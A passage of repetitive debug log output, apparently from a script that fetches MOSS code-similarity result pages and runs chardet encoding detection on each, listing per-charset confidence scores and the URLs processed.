confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5430379359377011\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5368806961752206\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.531539991108428\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5512264005800802\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not 
active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19294\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19281\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19294\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19281\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19281\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19282\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19281\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32278\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not 
active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32279\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32278\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.531539991108428\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16938\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32299\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24821\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16925\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32286\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24834\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16938\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16925\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24821\nDEBUG:chardet.charsetprober:GB2312 
0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match157-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match164-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match163-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5449933600301503\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 
0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match165-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36689\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36676\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36689\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36676\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36676\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16127\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19203\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36677\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16114\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19190\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16127\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19203\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36676\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16114\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19190\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match166-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16114\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19190\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16115\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5625865661721603\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP 
not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19191\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16114\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-0.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19190\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match167-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5512838554397638\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 
0.5392249343776532\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match169-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16159\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16159\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match170-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16160\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16159\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5391977486644284\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 
0.505\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 